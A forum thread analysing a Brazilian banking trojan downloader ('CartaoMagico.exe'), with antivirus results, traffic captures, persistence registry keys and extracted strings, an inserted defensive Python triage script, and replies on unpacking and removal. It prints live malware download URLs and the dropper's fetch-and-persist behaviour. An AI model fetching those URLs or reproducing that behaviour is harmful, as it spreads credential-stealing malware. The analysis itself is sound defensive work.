
CartaoMagico Analysis


4ed47c2818df67c87614f3c859fa48fb

found at: http://www.csfederalismo.it/User/flash/CartaoMagico.exe
appears to be packed with PECompact2
has a Microsoft Word icon

AntiVir 7.3.0.21 12.27.2006 TR/Delphi.Downloader.Gen
Authentium 4.93.8 12.22.2006 no virus found
Avast 4.7.892.0 12.21.2006 no virus found
AVG 386 12.27.2006 no virus found
BitDefender 7.2 12.27.2006 Trojan.IM.Flooder.Delf.H
CAT-QuickHeal 8.00 12.27.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 12.27.2006 Trojan.Downloader.Banload-1331
DrWeb 4.33 12.27.2006 DLOADER.Trojan
eSafe 7.0.14.0 12.26.2006 Suspicious Trojan/Worm
eTrust-InoculateIT 23.73.99 12.27.2006 no virus found
eTrust-Vet 30.3.3283 12.27.2006 no virus found
Ewido 4.0 12.26.2006 Downloader.Banload.atk
Fortinet 2.82.0.0 12.27.2006 no virus found
F-Prot 3.16f 12.22.2006 no virus found
F-Prot4 4.2.1.29 12.22.2006 no virus found
Ikarus T3.1.0.27 12.27.2006 Trojan-Spy.Win32.Banker.anv
Kaspersky 4.0.2.24 12.27.2006 IM-Flooder.Win32.Delf.h
McAfee 4927 12.27.2006 no virus found
Microsoft 1.1904 12.27.2006 no virus found
NOD32v2 1940 12.27.2006 a variant of Win32/TrojanDownloader.Banload.BDJ
Norman 5.80.02 12.27.2006 no virus found
Panda 9.0.0.4 12.27.2006 Suspicious file
Prevx1 V2 12.27.2006 no virus found
Sophos 4.13.0 12.26.2006 no virus found
Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious
TheHacker 6.0.3.137 12.27.2006 no virus found
UNA 1.83 12.27.2006 no virus found
VBA32 3.11.1 12.27.2006 IM-Worm.Win32.Delf.c
VirusBuster 4.3.19:9 12.27.2006 no virus found

connects to:

74.52.107.230 and gets /banco.exe
OrgName: ThePlanet.com Internet Services, Inc.
OrgID: TPCM
Address: 1333 North Stemmons Freeway
Address: Suite 110
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US

banco.exe is associated with https://internetcaixa.caixa.gov.br/NASApp/SIIBC/2a11c6f08b4c661eb14410ea7963b3.processaU
So maybe a Brazilian bank hijacker.

creates processes
ExAlien.exe
winlogin.exe

adds files
c:\documents and settings\all users\start menu\programs\startup\exalien.exe
c:\documents and settings\username\local settings\temporary internet files\content.ie5\randomname\banco.exe
c:\windows\system32\winlogin.exe
C:\Arquivos de programas\ExAlien.exe
C:\WINDOWS\winlogin.exe

adds registry keys
hkey_local_machine\software\microsoft\windows\currentversion\run\ cartomagico
hkey_local_machine\software\microsoft\windows\currentversion\run\ exalien
These are kind of weird:

HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
HKCC\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable

opens a browser window and connects to google

connects to

74.52.107.230 and gets /banco.exe

GET /banco.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.inovaimoveis.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Length: 1487872
Content-Type: application/octet-stream
Last-Modified: Tue, 26 Dec 2006 22:08:21 GMT
Accept-Ranges: bytes
ETag: "1a2485b3a29c71:85b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 27 Dec 2006 22:56:32 GMT

MZP

Then for some reason it connects to the BBC:
212.58.226.8
GET /rss/newsonline_world_edition/front_page/rss.xml HTTP/1.1
Host: newsrss.bbc.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
If-Modified-Since: Tue, 10 Jan 2006 06:41:43 GMT
If-None-Match: "40bf-6896d7c0"
Cache-Control: max-age=0

HTTP/1.1 200 OK
Date: Wed, 27 Dec 2006 22:56:47 GMT
Server: Apache
Last-Modified: Wed, 27 Dec 2006 22:41:41 GMT
Etag: "4277-bbff3340"
Accept-Ranges: bytes
Content-Length: 17015
Cache-Control: max-age=60
Expires: Wed, 27 Dec 2006 22:57:47 GMT
Keep-Alive: timeout=10, max=52
Connection: Keep-Alive
Content-Type: application/xml

STRINGS:

00000050 00400050 0 This program must be run under Win32
00000220 00400220 0 .rsrc
00000248 00400248 0 .mackt
00001006 00401006 0 Boolean
0000101B 0040101B 0 False
00001042 00401042 0 Integer
00001082 00401082 0 Cardinal
0000109A 0040109A 0 String
000010ED 004010ED 0 TObject
000010FA 004010FA 0 TObject
0000110C 0040110C 0 System
0000111A 0040111A 0 IInterface
0000113A 0040113A 0 System
000011E1 004011E1 0 TInterfacedObject
000011F9 004011F9 0 TDateTime
000031F0 004031F0 0 SOFTWARE\Borland\Delphi\RTL
0000320C 0040320C 0 FPUMaskValue
00005454 00405454 0 kernel32.dll
00005464 00405464 0 GetLongPathNameA
000054FD 004054FD 0 Uh}U@
000056A8 004056A8 0 Software\Borland\Locales
000056C4 004056C4 0 Software\Borland\Delphi\Locales
000057ED 004057ED 0 UhHX@
00005A2B 00405A2B 0 FFF;M
000060DA 004060DA 0 odSelected
000060E5 004060E5 0 odGrayed
000060EE 004060EE 0 odDisabled odChecked odFocused odDefault
00006117 00406117 0 odHotLight
00006122 00406122 0 odInactive odNoAccel
00006137 00406137 0 odNoFocusRect
00006145 00406145 0 odReserved1
00006151 00406151 0 odReserved2

There are a TON of strings, so I didn't include them all, but here are some more good ones:

open
C\WINDOWS\System32\winlogin.exe
http//ww.inovaimoveis.com/banco.exe
C\WINDOWS\System32\winlogin.exe
\Software\Microsoft\Windows\CurrentVersion\Run
\winlogin.exe
\Software\Microsoft\Windows\CurrentVersion\Run
\winlogin.exe
open
http//ww.google.com/
open
C\WINDOWS\System32\winlogin.exe
http//ww.inovaimoveis.com/banco.exe
C\WINDOWS\System32\winlogin.exe
Conversa

more later,

V.
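As an added example (not part of V.'s post or any reply in this thread): a Python triage script that parses a Run-key .reg export and a file listing and flags the persistence artifacts listed above, treating winlogin.exe as a lookalike of the legitimate winlogon.exe. The registry export and file list are constructed sample input, and the function names are my own.

```python
import re

# Indicators from the analysis above; winlogin.exe mimics the legitimate winlogon.exe.
RUN_VALUE_NAMES = {"cartomagico", "exalien"}
DROPPED_FILES = {"exalien.exe", "winlogin.exe", "banco.exe"}
LOOKALIKE = {"winlogin.exe": "winlogon.exe"}
REG_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')  # one "name"="data" line

def parse_reg_run_key(reg_text):
    """Return {value_name: data} from the [...\\CurrentVersion\\Run] section of a .reg export."""
    values, in_run = {}, False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):  # section header: are we inside the Run key?
            in_run = line.lower().endswith(r"\currentversion\run]")
            continue
        m = REG_VALUE_RE.match(line)
        if in_run and m:  # .reg exports double every backslash; undo that
            values[m.group("name")] = m.group("data").replace("\\\\", "\\")
    return values

def classify(name, path):
    """Why a Run value (name, path) or a bare file path (name=None) is suspicious, else None."""
    low = path.lower().replace("/", "\\")
    base = low.rsplit("\\", 1)[-1]
    if name is not None and name.lower() in RUN_VALUE_NAMES:
        return "known Run value name"
    if base in LOOKALIKE:
        return "lookalike of " + LOOKALIKE[base]
    if base in DROPPED_FILES:
        return "dropped into startup folder" if "\\startup\\" in low else "known dropped file"

def triage(run_values, paths):
    """Hits as (what, reason): Run values by their name, files on disk by their path."""
    hits = [(n, classify(n, d)) for n, d in run_values.items() if classify(n, d)]
    return hits + [(p, classify(None, p)) for p in paths if classify(None, p)]

# Constructed sample input (not from a real host): a Run-key export and a file listing.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cartomagico"="C:\\WINDOWS\\system32\\winlogin.exe"
"exalien"="C:\\Arquivos de programas\\ExAlien.exe"
"VMware Tools"="C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe"
'''
SAMPLE_FILES = [
    r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\exalien.exe",
    r"C:\WINDOWS\system32\winlogon.exe",  # the legitimate binary, must not be flagged
    r"C:\WINDOWS\winlogin.exe",
]
```

Running `triage(parse_reg_run_key(SAMPLE_REG), SAMPLE_FILES)` on the sample yields the two Run values, the startup-folder drop and the winlogon lookalike, and nothing for the benign entries.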

Packer

It looks like it's actually packed with PECompact2. That being the case UnPECompact won't work against it. I know there are supposed to be some OllyDbg scripts out there that will unpack it, but I don't know the URL. Anyone got a link to it/them?

-cdh

I didn't have much trouble

I didn't have much trouble dynamically unpacking it; however, a first stop site for RE tools, scripts, and information is Pedram's OpenRCE. I highly recommend it; Pedram really knows what he's doing. I also recommend his and Ero's RE malware class at Black Hat if you can afford it.

Here is a link to the ollyscripts.

http://www.openrce.org/downloads/browse/OllyDbg_OllyScripts

V.

yeh

A typical Brazilian

A typical Brazilian banker.
We developed a tool to remove this kind of malware, which is very common in Brazil; see:
http://linhadefensiva.uol.com.br/forum/index.php?showtopic=15496&st=0&#entry73404

Fabio Assolini
Security Coordinator
www.linhadefensiva.org

Thanks!

Thanks a lot for the response. That's very useful information.

Please feel free to contribute any time.

V.